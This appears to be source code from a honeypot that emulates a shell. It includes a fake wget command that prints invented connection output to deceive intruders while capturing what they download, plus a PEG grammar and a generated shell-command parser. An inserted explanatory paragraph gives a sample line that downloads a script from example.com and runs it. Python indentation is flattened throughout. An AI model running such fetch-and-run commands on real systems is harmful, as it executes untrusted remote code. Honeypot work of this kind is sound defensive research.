def dl(self, env, url, path=None, echo=True):
u = urlparse.urlparse(url)
host = u.hostname
ip = "127.0.0.1"
port = u.port if u.port else 80
date = datetime.datetime.now().strftime("%Y-%m-%d %H:%M:%S")
if echo:
env.write("--"+date+"-- " + url + "\n")
env.write("Resolving " + host + " (" + host + ")... " + ip + "\n")
env.write("Connecting to " + host + " (" + host + ")|" + ip + "|:" + str(port) + "...")
if path == None:
path = url.split("/")[-1].strip()
if path == "":
path = "index.html"
if config.get("fake_dl", optional=True, default=False):
data = str(hash(url))
info = ""
else:
hdr = { "User-Agent" : "Wget/1.15 (linux-gnu)" }
r = None
try:
r = requests.get(url, stream=True, timeout=5.0, headers=hdr)
if echo:
env.write(" connected\n")
env.write("HTTP request sent, awaiting response... 200 OK\n")
env.write("Length: unspecified [text/html]\n")
env.write("Saving to: '"+path+"'\n\n")
env.write(" 0K .......... 7,18M=0,001s\n\n")
env.write(date+" (7,18 MB/s) - '"+path+"' saved [11213]\n")
data = ""
for chunk in r.iter_content(chunk_size = 4096):
data = data + chunk
info = ""
for his in r.history:
info = info + "HTTP " + str(his.status_code) + "\n"
for k,v in his.headers.iteritems():
info = info + k + ": " + v + "\n"
info = info + "\n"
info = info + "HTTP " + str(r.status_code) + "\n"
for k,v in r.headers.iteritems():
info = info + k + ": " + v + "\n"
except requests.ConnectTimeout as e:
data = None
info = "Download failed"
if echo:
env.write(" failed: Connection timed out.\n")
env.write("Giving up.\n\n")
except requests.ConnectionError as e:
data = None
info = "Download failed"
if echo:
env.write(" failed: Connection refused.\n")
env.write("Giving up.\n\n")
except requests.ReadTimeout as e:
data = None
info = "Download failed"
if echo:
env.write(" failed: Read timeout.\n")
env.write("Giving up.\n\n")
except Exception as e:
data = None
info = "Download failed"
if echo:
env.write(" failed: " + str(e.message) + ".\n")
env.write("Giving up.\n\n")
if data:
env.writeFile(path, data)
env.action("download", {
"url": url,
"path": path,
"info": info,
"data": data
})
def run(self, env, args):
if len(args) == 0:
env.write("""BusyBox v1.22.1 (Ubuntu 1:1.22.0-19ubuntu2) multi-call binary.
Usage: wget [-c|--continue] [-s|--spider] [-q|--quiet] [-O|--output-document FILE]
[--header 'header: value'] [-Y|--proxy on/off] [-P DIR]
[-U|--user-agent AGENT] URL...
Retrieve files via HTTP or FTP
-s Spider mode - only check file existence
-c Continue retrieval of aborted transfer
-q Quiet
-P DIR Save to DIR (default .)
-O FILE Save to FILE ('-' for stdout)
-U STR Use STR for User-Agent header
-Y Use proxy ('on' or 'off')
""")
return 1
else:
echo = True
for arg in args:
if arg == "-O":
echo = False
for url in args:
if url.startswith("http"):
self.dl(env, url, echo=echo)
return 0
Proc.register("wget", Wget())
================================================
FILE: honeypot/shell/grammar.peg
================================================
grammar cmd
cmd <- cmdlist / empty
cmdlist <- cmdsingle (sep (";" / "&") sep cmdlist)? %make_list
cmdsingle <- cmdpipe (sep ("||" / "&&") sep cmdsingle)? %make_single
cmdpipe <- cmdredir (sep ("|" !"|") sep cmdpipe)? %make_pipe
cmdredir <- cmdargs ( sep (">>-" / ">>" / "<<" / "<>" / "<&" / ">&" / "<" / ">") sep arg )* %make_redir
cmdargs <- cmdbrac / args
cmdbrac <- "(" sep cmd sep ")" %make_cmdbrac
args <- arg (" "+ arg)* %make_args
arg <- arg_quot1 / arg_quot2 / arg_noquot / empty
arg_noempty <- arg_quot1 / arg_quot2 / arg_noquot
arg_quot1 <- "'" [^']* "'" %make_arg_quot
arg_quot2 <- '"' [^"]* '"' %make_arg_quot
arg_noquot <- [^ ;|&()"'><]+ %make_arg_noquot
empty <- ""?
sep <- " "*
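The `arg_noquot` rule above accepts any run of characters outside the shell metacharacter set `[ ;|&()"'><]`, which is why URLs and paths survive as single arguments while `;`, `&&` and `|` split commands. A quick regex mirror of just that character class (not the full grammar):

```python
import re

# Same character class as the arg_noquot rule in grammar.peg.
ARG_NOQUOT = re.compile(r"""[^ ;|&()"'><]+""")

line = "cd /tmp; wget http://example.com/x.sh && sh x.sh"
args = ARG_NOQUOT.findall(line)
# The URL stays intact; ";" and "&&" are dropped as separators.
```

Quoting, redirection and pipelines are of course handled by the surrounding grammar rules, not by this class alone.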
================================================
FILE: honeypot/shell/grammar.py
================================================
from collections import defaultdict
import re
class TreeNode(object):
def __init__(self, text, offset, elements=None):
self.text = text
self.offset = offset
self.elements = elements or []
def __iter__(self):
for el in self.elements:
yield el
class TreeNode1(TreeNode):
def __init__(self, text, offset, elements):
super(TreeNode1, self).__init__(text, offset, elements)
self.cmdsingle = elements[0]
class TreeNode2(TreeNode):
def __init__(self, text, offset, elements):
super(TreeNode2, self).__init__(text, offset, elements)
self.sep = elements[2]
self.cmdlist = elements[3]
class TreeNode3(TreeNode):
def __init__(self, text, offset, elements):
super(TreeNode3, self).__init__(text, offset, elements)
self.cmdpipe = elements[0]
class TreeNode4(TreeNode):
def __init__(self, text, offset, elements):
super(TreeNode4, self).__init__(text, offset, elements)
self.sep = elements[2]
self.cmdsingle = elements[3]
class TreeNode5(TreeNode):
def __init__(self, text, offset, elements):
super(TreeNode5, self).__init__(text, offset, elements)
self.cmdredir = elements[0]
class TreeNode6(TreeNode):
def __init__(self, text, offset, elements):
super(TreeNode6, self).__init__(text, offset, elements)
self.sep = elements[2]
self.cmdpipe = elements[3]
class TreeNode7(TreeNode):
def __init__(self, text, offset, elements):
super(TreeNode7, self).__init__(text, offset, elements)
self.cmdargs = elements[0]
class TreeNode8(TreeNode):
def __init__(self, text, offset, elements):
super(TreeNode8, self).__init__(text, offset, elements)
self.sep = elements[2]
self.arg = elements[3]
class TreeNode9(TreeNode):
def __init__(self, text, offset, elements):
super(TreeNode9, self).__init__(text, offset, elements)
self.sep = elements[3]
self.cmd = elements[2]
class TreeNode10(TreeNode):
def __init__(self, text, offset, elements):
super(TreeNode10, self).__init__(text, offset, elements)
self.arg = elements[0]
class TreeNode11(TreeNode):
def __init__(self, text, offset, elements):
super(TreeNode11, self).__init__(text, offset, elements)
self.arg = elements[1]
class ParseError(SyntaxError):
pass
FAILURE = object()
class Grammar(object):
REGEX_1 = re.compile('^[^\']')
REGEX_2 = re.compile('^[^"]')
REGEX_3 = re.compile('^[^ ;|&()"\'><]')
def _read_cmd(self):
address0, index0 = FAILURE, self._offset
cached = self._cache['cmd'].get(index0)
if cached:
self._offset = cached[1]
return cached[0]
index1 = self._offset
address0 = self._read_cmdlist()
if address0 is FAILURE:
self._offset = index1
address0 = self._read_empty()
if address0 is FAILURE:
self._offset = index1
self._cache['cmd'][index0] = (address0, self._offset)
return address0
def _read_cmdlist(self):
address0, index0 = FAILURE, self._offset
cached = self._cache['cmdlist'].get(index0)
if cached:
self._offset = cached[1]
return cached[0]
index1, elements0 = self._offset, []
address1 = FAILURE
address1 = self._read_cmdsingle()
if address1 is not FAILURE:
elements0.append(address1)
address2 = FAILURE
index2 = self._offset
index3, elements1 = self._offset, []
address3 = FAILURE
address3 = self._read_sep()
if address3 is not FAILURE:
elements1.append(address3)
address4 = FAILURE
index4 = self._offset
chunk0 = None
if self._offset < self._input_size:
chunk0 = self._input[self._offset:self._offset + 1]
if chunk0 == ';':
address4 = TreeNode(self._input[self._offset:self._offset + 1], self._offset)
self._offset = self._offset + 1
else:
address4 = FAILURE
if self._offset > self._failure:
self._failure = self._offset
self._expected = []
if self._offset == self._failure:
self._expected.append('";"')
if address4 is FAILURE:
self._offset = index4
chunk1 = None
if self._offset < self._input_size:
chunk1 = self._input[self._offset:self._offset + 1]
if chunk1 == '&':
address4 = TreeNode(self._input[self._offset:self._offset + 1], self._offset)
self._offset = self._offset + 1
else:
address4 = FAILURE
if self._offset > self._failure:
self._failure = self._offset
self._expected = []
if self._offset == self._failure:
self._expected.append('"&"')
if address4 is FAILURE:
self._offset = index4
if address4 is not FAILURE:
elements1.append(address4)
address5 = FAILURE
address5 = self._read_sep()
if address5 is not FAILURE:
elements1.append(address5)
address6 = FAILURE
address6 = self._read_cmdlist()
if address6 is not FAILURE:
elements1.append(address6)
else:
elements1 = None
self._offset = index3
else:
elements1 = None
self._offset = index3
else:
elements1 = None
self._offset = index3
else:
elements1 = None
self._offset = index3
if elements1 is None:
address2 = FAILURE
else:
address2 = TreeNode2(self._input[index3:self._offset], index3, elements1)
self._offset = self._offset
if address2 is FAILURE:
address2 = TreeNode(self._input[index2:index2], index2)
self._offset = index2
if address2 is not FAILURE:
elements0.append(address2)
else:
elements0 = None
self._offset = index1
else:
elements0 = None
self._offset = index1
if elements0 is None:
address0 = FAILURE
else:
address0 = self._actions.make_list(self._input, index1, self._offset, elements0)
self._offset = self._offset
self._cache['cmdlist'][index0] = (address0, self._offset)
return address0
def _read_cmdsingle(self):
address0, index0 = FAILURE, self._offset
cached = self._cache['cmdsingle'].get(index0)
if cached:
self._offset = cached[1]
return cached[0]
index1, elements0 = self._offset, []
address1 = FAILURE
address1 = self._read_cmdpipe()
if address1 is not FAILURE:
elements0.append(address1)
address2 = FAILURE
index2 = self._offset
index3, elements1 = self._offset, []
address3 = FAILURE
address3 = self._read_sep()
if address3 is not FAILURE:
elements1.append(address3)
address4 = FAILURE
index4 = self._offset
chunk0 = None
if self._offset < self._input_size:
chunk0 = self._input[self._offset:self._offset + 2]
if chunk0 == '||':
address4 = TreeNode(self._input[self._offset:self._offset + 2], self._offset)
self._offset = self._offset + 2
else:
address4 = FAILURE
if self._offset > self._failure:
self._failure = self._offset
self._expected = []
if self._offset == self._failure:
self._expected.append('"||"')
if address4 is FAILURE:
self._offset = index4
chunk1 = None
if self._offset < self._input_size:
chunk1 = self._input[self._offset:self._offset + 2]
if chunk1 == '&&':
address4 = TreeNode(self._input[self._offset:self._offset + 2], self._offset)
self._offset = self._offset + 2
else:
address4 = FAILURE
if self._offset > self._failure:
self._failure = self._offset
self._expected = []
if self._offset == self._failure:
self._expected.append('"&&"')
if address4 is FAILURE:
self._offset = index4
if address4 is not FAILURE:
elements1.append(address4)
address5 = FAILURE
address5 = self._read_sep()
if address5 is not FAILURE:
elements1.append(address5)
address6 = FAILURE
address6 = self._read_cmdsingle()
if address6 is not FAILURE:
elements1.append(address6)
else:
elements1 = None
self._offset = index3
else:
elements1 = None
self._offset = index3
else:
elements1 = None
self._offset = index3
else:
elements1 = None
self._offset = index3
if elements1 is None:
address2 = FAILURE
else:
address2 = TreeNode4(self._input[index3:self._offset], index3, elements1)
self._offset = self._offset
if address2 is FAILURE:
address2 = TreeNode(self._input[index2:index2], index2)
self._offset = index2
if address2 is not FAILURE:
elements0.append(address2)
else:
elements0 = None
self._offset = index1
else:
elements0 = None
self._offset = index1
if elements0 is None:
address0 = FAILURE
else:
address0 = self._actions.make_single(self._input, index1, self._offset, elements0)
self._offset = self._offset
self._cache['cmdsingle'][index0] = (address0, self._offset)
return address0
def _read_cmdpipe(self):
address0, index0 = FAILURE, self._offset
cached = self._cache['cmdpipe'].get(index0)
if cached:
self._offset = cached[1]
return cached[0]
index1, elements0 = self._offset, []
address1 = FAILURE
address1 = self._read_cmdredir()
if address1 is not FAILURE:
elements0.append(address1)
address2 = FAILURE
index2 = self._offset
index3, elements1 = self._offset, []
address3 = FAILURE
address3 = self._read_sep()
if address3 is not FAILURE:
elements1.append(address3)
address4 = FAILURE
index4, elements2 = self._offset, []
address5 = FAILURE
chunk0 = None
if self._offset < self._input_size:
chunk0 = self._input[self._offset:self._offset + 1]
if chunk0 == '|':
address5 = TreeNode(self._input[self._offset:self._offset + 1], self._offset)
self._offset = self._offset + 1
else:
address5 = FAILURE
if self._offset > self._failure:
self._failure = self._offset
self._expected = []
if self._offset == self._failure:
self._expected.append('"|"')
if address5 is not FAILURE:
elements2.append(address5)
address6 = FAILURE
index5 = self._offset
chunk1 = None
if self._offset < self._input_size:
chunk1 = self._input[self._offset:self._offset + 1]
if chunk1 == '|':
address6 = TreeNode(self._input[self._offset:self._offset + 1], self._offset)
self._offset = self._offset + 1
else:
address6 = FAILURE
if self._offset > self._failure:
self._failure = self._offset
self._expected = []
if self._offset == self._failure:
self._expected.append('"|"')
self._offset = index5
if address6 is FAILURE:
address6 = TreeNode(self._input[self._offset:self._offset], self._offset)
self._offset = self._offset
else:
address6 = FAILURE
if address6 is not FAILURE:
elements2.append(address6)
else:
elements2 = None
self._offset = index4
else:
elements2 = None
self._offset = index4
if elements2 is None:
address4 = FAILURE
else:
address4 = TreeNode(self._input[index4:self._offset], index4, elements2)
self._offset = self._offset
if address4 is not FAILURE:
elements1.append(address4)
address7 = FAILURE
address7 = self._read_sep()
if address7 is not FAILURE:
elements1.append(address7)
address8 = FAILURE
address8 = self._read_cmdpipe()
if address8 is not FAILURE:
elements1.append(address8)
else:
elements1 = None
self._offset = index3
else:
elements1 = None
self._offset = index3
else:
elements1 = None
self._offset = index3
else:
elements1 = None
self._offset = index3
if elements1 is None:
address2 = FAILURE
else:
address2 = TreeNode6(self._input[index3:self._offset], index3, elements1)
self._offset = self._offset
if address2 is FAILURE:
address2 = TreeNode(self._input[index2:index2], index2)
self._offset = index2
if address2 is not FAILURE:
elements0.append(address2)
else:
elements0 = None
self._offset = index1
else:
elements0 = None
self._offset = index1
if elements0 is None:
address0 = FAILURE
else:
address0 = self._actions.make_pipe(self._input, index1, self._offset, elements0)
self._offset = self._offset
self._cache['cmdpipe'][index0] = (address0, self._offset)
return address0
def _read_cmdredir(self):
address0, index0 = FAILURE, self._offset
cached = self._cache['cmdredir'].get(index0)
if cached:
self._offset = cached[1]
return cached[0]
index1, elements0 = self._offset, []
address1 = FAILURE
address1 = self._read_cmdargs()
if address1 is not FAILURE:
elements0.append(address1)
address2 = FAILURE
remaining0, index2, elements1, address3 = 0, self._offset, [], True
while address3 is not FAILURE:
index3, elements2 = self._offset, []
address4 = FAILURE
address4 = self._read_sep()
if address4 is not FAILURE:
elements2.append(address4)
address5 = FAILURE
index4 = self._offset
chunk0 = None
if self._offset < self._input_size:
chunk0 = self._input[self._offset:self._offset + 3]
if chunk0 == '>>-':
address5 = TreeNode(self._input[self._offset:self._offset + 3], self._offset)
self._offset = self._offset + 3
else:
address5 = FAILURE
if self._offset > self._failure:
self._failure = self._offset
self._expected = []
if self._offset == self._failure:
self._expected.append('">>-"')
if address5 is FAILURE:
self._offset = index4
chunk1 = None
if self._offset < self._input_size:
chunk1 = self._input[self._offset:self._offset + 2]
if chunk1 == '>>':
address5 = TreeNode(self._input[self._offset:self._offset + 2], self._offset)
self._offset = self._offset + 2
else:
address5 = FAILURE
if self._offset > self._failure:
self._failure = self._offset
self._expected = []
if self._offset == self._failure:
self._expected.append('">>"')
if address5 is FAILURE:
self._offset = index4
chunk2 = None
if self._offset < self._input_size:
chunk2 = self._input[self._offset:self._offset + 2]
if chunk2 == '<<':
address5 = TreeNode(self._input[self._offset:self._offset + 2], self._offset)
self._offset = self._offset + 2
else:
address5 = FAILURE
if self._offset > self._failure:
self._failure = self._offset
self._expected = []
if self._offset == self._failure:
self._expected.append('"<<"')
if address5 is FAILURE:
self._offset = index4
chunk3 = None
if self._offset < self._input_size:
chunk3 = self._input[self._offset:self._offset + 2]
if chunk3 == '<>':
address5 = TreeNode(self._input[self._offset:self._offset + 2], self._offset)
self._offset = self._offset + 2
else:
address5 = FAILURE
if self._offset > self._failure:
self._failure = self._offset
self._expected = []
if self._offset == self._failure:
self._expected.append('"<>"')
if address5 is FAILURE:
self._offset = index4
chunk4 = None
if self._offset < self._input_size:
chunk4 = self._input[self._offset:self._offset + 2]
if chunk4 == '<&':
address5 = TreeNode(self._input[self._offset:self._offset + 2], self._offset)
self._offset = self._offset + 2
else:
address5 = FAILURE
if self._offset > self._failure:
self._failure = self._offset
self._expected = []
if self._offset == self._failure:
self._expected.append('"<&"')
if address5 is FAILURE:
self._offset = index4
chunk5 = None
if self._offset < self._input_size:
chunk5 = self._input[self._offset:self._offset + 2]
if chunk5 == '>&':
address5 = TreeNode(self._input[self._offset:self._offset + 2], self._offset)
self._offset = self._offset + 2
else:
address5 = FAILURE
if self._offset > self._failure:
self._failure = self._offset
self._expected = []
if self._offset == self._failure:
self._expected.append('">&"')
if address5 is FAILURE:
self._offset = index4
chunk6 = None
if self._offset < self._input_size:
chunk6 = self._input[self._offset:self._offset + 1]
if chunk6 == '<':
address5 = TreeNode(self._input[self._offset:self._offset + 1], self._offset)
self._offset = self._offset + 1
else:
address5 = FAILURE
if self._offset > self._failure:
self._failure = self._offset
self._expected = []
if self._offset == self._failure:
self._expected.append('"<"')
if address5 is FAILURE:
self._offset = index4
chunk7 = None
if self._offset < self._input_size:
chunk7 = self._input[self._offset:self._offset + 1]
if chunk7 == '>':
address5 = TreeNode(self._input[self._offset:self._offset + 1], self._offset)
self._offset = self._offset + 1
else:
address5 = FAILURE
if self._offset > self._failure:
self._failure = self._offset
self._expected = []
if self._offset == self._failure:
self._expected.append('">"')
if address5 is FAILURE:
self._offset = index4
if address5 is not FAILURE:
elements2.append(address5)
address6 = FAILURE
address6 = self._read_sep()
if address6 is not FAILURE:
elements2.append(address6)
address7 = FAILURE
address7 = self._read_arg()
if address7 is not FAILURE:
elements2.append(address7)
else:
elements2 = None
self._offset = index3
else:
elements2 = None
self._offset = index3
else:
elements2 = None
self._offset = index3
else:
elements2 = None
self._offset = index3
if elements2 is None:
address3 = FAILURE
else:
address3 = TreeNode8(self._input[index3:self._offset], index3, elements2)
self._offset = self._offset
if address3 is not FAILURE:
elements1.append(address3)
remaining0 -= 1
if remaining0 <= 0:
address2 = TreeNode(self._input[index2:self._offset], index2, elements1)
self._offset = self._offset
else:
address2 = FAILURE
if address2 is not FAILURE:
elements0.append(address2)
else:
elements0 = None
self._offset = index1
else:
elements0 = None
self._offset = index1
if elements0 is None:
address0 = FAILURE
else:
address0 = self._actions.make_redir(self._input, index1, self._offset, elements0)
self._offset = self._offset
self._cache['cmdredir'][index0] = (address0, self._offset)
return address0
def _read_cmdargs(self):
address0, index0 = FAILURE, self._offset
cached = self._cache['cmdargs'].get(index0)
if cached:
self._offset = cached[1]
return cached[0]
index1 = self._offset
address0 = self._read_cmdbrac()
if address0 is FAILURE:
self._offset = index1
address0 = self._read_args()
if address0 is FAILURE:
self._offset = index1
self._cache['cmdargs'][index0] = (address0, self._offset)
return address0
def _read_cmdbrac(self):
address0, index0 = FAILURE, self._offset
cached = self._cache['cmdbrac'].get(index0)
if cached:
self._offset = cached[1]
return cached[0]
index1, elements0 = self._offset, []
address1 = FAILURE
chunk0 = None
if self._offset < self._input_size:
chunk0 = self._input[self._offset:self._offset + 1]
if chunk0 == '(':
address1 = TreeNode(self._input[self._offset:self._offset + 1], self._offset)
self._offset = self._offset + 1
else:
address1 = FAILURE
if self._offset > self._failure:
self._failure = self._offset
self._expected = []
if self._offset == self._failure:
self._expected.append('"("')
if address1 is not FAILURE:
elements0.append(address1)
address2 = FAILURE
address2 = self._read_sep()
if address2 is not FAILURE:
elements0.append(address2)
address3 = FAILURE
address3 = self._read_cmd()
if address3 is not FAILURE:
elements0.append(address3)
address4 = FAILURE
address4 = self._read_sep()
if address4 is not FAILURE:
elements0.append(address4)
address5 = FAILURE
chunk1 = None
if self._offset < self._input_size:
chunk1 = self._input[self._offset:self._offset + 1]
if chunk1 == ')':
address5 = TreeNode(self._input[self._offset:self._offset + 1], self._offset)
self._offset = self._offset + 1
else:
address5 = FAILURE
if self._offset > self._failure:
self._failure = self._offset
self._expected = []
if self._offset == self._failure:
self._expected.append('")"')
if address5 is not FAILURE:
elements0.append(address5)
else:
elements0 = None
self._offset = index1
else:
elements0 = None
self._offset = index1
else:
elements0 = None
self._offset = index1
else:
elements0 = None
self._offset = index1
else:
elements0 = None
self._offset = index1
if elements0 is None:
address0 = FAILURE
else:
address0 = self._actions.make_cmdbrac(self._input, index1, self._offset, elements0)
self._offset = self._offset
self._cache['cmdbrac'][index0] = (address0, self._offset)
return address0
def _read_args(self):
address0, index0 = FAILURE, self._offset
cached = self._cache['args'].get(index0)
if cached:
self._offset = cached[1]
return cached[0]
index1, elements0 = self._offset, []
address1 = FAILURE
address1 = self._read_arg()
if address1 is not FAILURE:
elements0.append(address1)
address2 = FAILURE
remaining0, index2, elements1, address3 = 0, self._offset, [], True
while address3 is not FAILURE:
index3, elements2 = self._offset, []
address4 = FAILURE
remaining1, index4, elements3, address5 = 1, self._offset, [], True
while address5 is not FAILURE:
chunk0 = None
if self._offset < self._input_size:
chunk0 = self._input[self._offset:self._offset + 1]
if chunk0 == ' ':
address5 = TreeNode(self._input[self._offset:self._offset + 1], self._offset)
self._offset = self._offset + 1
else:
address5 = FAILURE
if self._offset > self._failure:
self._failure = self._offset
self._expected = []
if self._offset == self._failure:
self._expected.append('" "')
if address5 is not FAILURE:
elements3.append(address5)
remaining1 -= 1
if remaining1 <= 0:
address4 = TreeNode(self._input[index4:self._offset], index4, elements3)
self._offset = self._offset
else:
address4 = FAILURE
if address4 is not FAILURE:
elements2.append(address4)
address6 = FAILURE
address6 = self._read_arg()
if address6 is not FAILURE:
elements2.append(address6)
else:
elements2 = None
self._offset = index3
else:
elements2 = None
self._offset = index3
if elements2 is None:
address3 = FAILURE
else:
address3 = TreeNode11(self._input[index3:self._offset], index3, elements2)
self._offset = self._offset
if address3 is not FAILURE:
elements1.append(address3)
remaining0 -= 1
if remaining0 <= 0:
address2 = TreeNode(self._input[index2:self._offset], index2, elements1)
self._offset = self._offset
else:
address2 = FAILURE
if address2 is not FAILURE:
elements0.append(address2)
else:
elements0 = None
self._offset = index1
else:
elements0 = None
self._offset = index1
if elements0 is None:
address0 = FAILURE
else:
address0 = self._actions.make_args(self._input, index1, self._offset, elements0)
self._offset = self._offset
self._cache['args'][index0] = (address0, self._offset)
return address0
def _read_arg(self):
address0, index0 = FAILURE, self._offset
cached = self._cache['arg'].get(index0)
if cached:
self._offset = cached[1]
return cached[0]
index1 = self._offset
address0 = self._read_arg_quot1()
if address0 is FAILURE:
self._offset = index1
address0 = self._read_arg_quot2()
if address0 is FAILURE:
self._offset = index1
address0 = self._read_arg_noquot()
if address0 is FAILURE:
self._offset = index1
address0 = self._read_empty()
if address0 is FAILURE:
self._offset = index1
self._cache['arg'][index0] = (address0, self._offset)
return address0
def _read_arg_noempty(self):
address0, index0 = FAILURE, self._offset
cached = self._cache['arg_noempty'].get(index0)
if cached:
self._offset = cached[1]
return cached[0]
index1 = self._offset
address0 = self._read_arg_quot1()
if address0 is FAILURE:
self._offset = index1
address0 = self._read_arg_quot2()
if address0 is FAILURE:
self._offset = index1
address0 = self._read_arg_noquot()
if address0 is FAILURE:
self._offset = index1
self._cache['arg_noempty'][index0] = (address0, self._offset)
return address0
def _read_arg_quot1(self):
address0, index0 = FAILURE, self._offset
cached = self._cache['arg_quot1'].get(index0)
if cached:
self._offset = cached[1]
return cached[0]
index1, elements0 = self._offset, []
address1 = FAILURE
chunk0 = None
if self._offset < self._input_size:
chunk0 = self._input[self._offset:self._offset + 1]
if chunk0 == '\'':
address1 = TreeNode(self._input[self._offset:self._offset + 1], self._offset)
self._offset = self._offset + 1
else:
address1 = FAILURE
if self._offset > self._failure:
self._failure = self._offset
self._expected = []
if self._offset == self._failure:
self._expected.append('"\'"')
if address1 is not FAILURE:
elements0.append(address1)
address2 = FAILURE
remaining0, index2, elements1, address3 = 0, self._offset, [], True
while address3 is not FAILURE:
chunk1 = None
if self._offset < self._input_size:
chunk1 = self._input[self._offset:self._offset + 1]
if chunk1 is not None and Grammar.REGEX_1.search(chunk1):
address3 = TreeNode(self._input[self._offset:self._offset + 1], self._offset)
self._offset = self._offset + 1
else:
address3 = FAILURE
if self._offset > self._failure:
self._failure = self._offset
self._expected = []
if self._offset == self._failure:
self._expected.append('[^\']')
if address3 is not FAILURE:
elements1.append(address3)
remaining0 -= 1
if remaining0 <= 0:
address2 = TreeNode(self._input[index2:self._offset], index2, elements1)
self._offset = self._offset
else:
address2 = FAILURE
if address2 is not FAILURE:
elements0.append(address2)
address4 = FAILURE
chunk2 = None
if self._offset < self._input_size:
chunk2 = self._input[self._offset:self._offset + 1]
if chunk2 == '\'':
address4 = TreeNode(self._input[self._offset:self._offset + 1], self._offset)
self._offset = self._offset + 1
else:
address4 = FAILURE
if self._offset > self._failure:
self._failure = self._offset
self._expected = []
if self._offset == self._failure:
self._expected.append('"\'"')
if address4 is not FAILURE:
elements0.append(address4)
else:
elements0 = None
self._offset = index1
else:
elements0 = None
self._offset = index1
else:
elements0 = None
self._offset = index1
if elements0 is None:
address0 = FAILURE
else:
address0 = self._actions.make_arg_quot(self._input, index1, self._offset, elements0)
self._offset = self._offset
self._cache['arg_quot1'][index0] = (address0, self._offset)
return address0
def _read_arg_quot2(self):
address0, index0 = FAILURE, self._offset
cached = self._cache['arg_quot2'].get(index0)
if cached:
self._offset = cached[1]
return cached[0]
index1, elements0 = self._offset, []
address1 = FAILURE
chunk0 = None
if self._offset < self._input_size:
chunk0 = self._input[self._offset:self._offset + 1]
if chunk0 == '"':
address1 = TreeNode(self._input[self._offset:self._offset + 1], self._offset)
self._offset = self._offset + 1
else:
address1 = FAILURE
if self._offset > self._failure:
self._failure = self._offset
self._expected = []
if self._offset == self._failure:
self._expected.append('\'"\'')
if address1 is not FAILURE:
elements0.append(address1)
address2 = FAILURE
remaining0, index2, elements1, address3 = 0, self._offset, [], True
while address3 is not FAILURE:
chunk1 = None
if self._offset < self._input_size:
chunk1 = self._input[self._offset:self._offset + 1]
if chunk1 is not None and Grammar.REGEX_2.search(chunk1):
address3 = TreeNode(self._input[self._offset:self._offset + 1], self._offset)
self._offset = self._offset + 1
else:
address3 = FAILURE
if self._offset > self._failure:
self._failure = self._offset
self._expected = []
if self._offset == self._failure:
self._expected.append('[^"]')
if address3 is not FAILURE:
elements1.append(address3)
remaining0 -= 1
if remaining0 <= 0:
address2 = TreeNode(self._input[index2:self._offset], index2, elements1)
self._offset = self._offset
else:
address2 = FAILURE
if address2 is not FAILURE:
elements0.append(address2)
address4 = FAILURE
chunk2 = None
if self._offset < self._input_size:
chunk2 = self._input[self._offset:self._offset + 1]
if chunk2 == '"':
address4 = TreeNode(self._input[self._offset:self._offset + 1], self._offset)
self._offset = self._offset + 1
else:
address4 = FAILURE
if self._offset > self._failure:
self._failure = self._offset
self._expected = []
if self._offset == self._failure:
self._expected.append('\'"\'')
if address4 is not FAILURE:
elements0.append(address4)
else:
elements0 = None
self._offset = index1
else:
elements0 = None
self._offset = index1
else:
elements0 = None
self._offset = index1
if elements0 is None:
address0 = FAILURE
else:
address0 = self._actions.make_arg_quot(self._input, index1, self._offset, elements0)
self._offset = self._offset
self._cache['arg_quot2'][index0] = (address0, self._offset)
return address0
def _read_arg_noquot(self):
address0, index0 = FAILURE, self._offset
cached = self._cache['arg_noquot'].get(index0)
if cached:
self._offset = cached[1]
return cached[0]
remaining0, index1, elements0, address1 = 1, self._offset, [], True
while address1 is not FAILURE:
chunk0 = None
if self._offset < self._input_size:
chunk0 = self._input[self._offset:self._offset + 1]
if chunk0 is not None and Grammar.REGEX_3.search(chunk0):
address1 = TreeNode(self._input[self._offset:self._offset + 1], self._offset)
self._offset = self._offset + 1
else:
address1 = FAILURE
if self._offset > self._failure:
self._failure = self._offset
self._expected = []
if self._offset == self._failure:
self._expected.append('[^ ;|&()"\'><]')
if address1 is not FAILURE:
elements0.append(address1)
remaining0 -= 1
if remaining0 <= 0:
address0 = self._actions.make_arg_noquot(self._input, index1, self._offset, elements0)
self._offset = self._offset
else:
address0 = FAILURE
self._cache['arg_noquot'][index0] = (address0, self._offset)
return address0
def _read_empty(self):
address0, index0 = FAILURE, self._offset
cached = self._cache['empty'].get(index0)
if cached:
self._offset = cached[1]
return cached[0]
index1 = self._offset
chunk0 = None
if self._offset < self._input_size:
chunk0 = self._input[self._offset:self._offset + 0]
if chunk0 == '':
address0 = TreeNode(self._input[self._offset:self._offset + 0], self._offset)
self._offset = self._offset + 0
else:
address0 = FAILURE
if self._offset > self._failure:
self._failure = self._offset
self._expected = []
if self._offset == self._failure:
self._expected.append('""')
if address0 is FAILURE:
address0 = TreeNode(self._input[index1:index1], index1)
self._offset = index1
self._cache['empty'][index0] = (address0, self._offset)
return address0
def _read_sep(self):
address0, index0 = FAILURE, self._offset
cached = self._cache['sep'].get(index0)
if cached:
self._offset = cached[1]
return cached[0]
remaining0, index1, elements0, address1 = 0, self._offset, [], True
while address1 is not FAILURE:
chunk0 = None
if self._offset < self._input_size:
chunk0 = self._input[self._offset:self._offset + 1]
if chunk0 == ' ':
address1 = TreeNode(self._input[self._offset:self._offset + 1], self._offset)
self._offset = self._offset + 1
else:
address1 = FAILURE
if self._offset > self._failure:
self._failure = self._offset
self._expected = []
if self._offset == self._failure:
self._expected.append('" "')
if address1 is not FAILURE:
elements0.append(address1)
remaining0 -= 1
if remaining0 <= 0:
address0 = TreeNode(self._input[index1:self._offset], index1, elements0)
self._offset = self._offset
else:
address0 = FAILURE
self._cache['sep'][index0] = (address0, self._offset)
return address0
class Parser(Grammar):
def __init__(self, input, actions, types):
self._input = input
self._input_size = len(input)
self._actions = actions
self._types = types
self._offset = 0
self._cache = defaultdict(dict)
self._failure = 0
self._expected = []
def parse(self):
tree = self._read_cmd()
if tree is not FAILURE and self._offset == self._input_size:
return tree
if not self._expected:
self._failure = self._offset
self._expected.append('<EOF>')
raise ParseError(format_error(self._input, self._failure, self._expected))
def format_error(input, offset, expected):
lines, line_no, position = input.split('\n'), 0, 0
while position <= offset:
position += len(lines[line_no]) + 1
line_no += 1
message, line = 'Line ' + str(line_no) + ': expected ' + ', '.join(expected) + '\n', lines[line_no - 1]
message += line + '\n'
position -= len(line) + 1
message += ' ' * (offset - position)
return message + '^'
def parse(input, actions=None, types=None):
parser = Parser(input, actions, types)
return parser.parse()
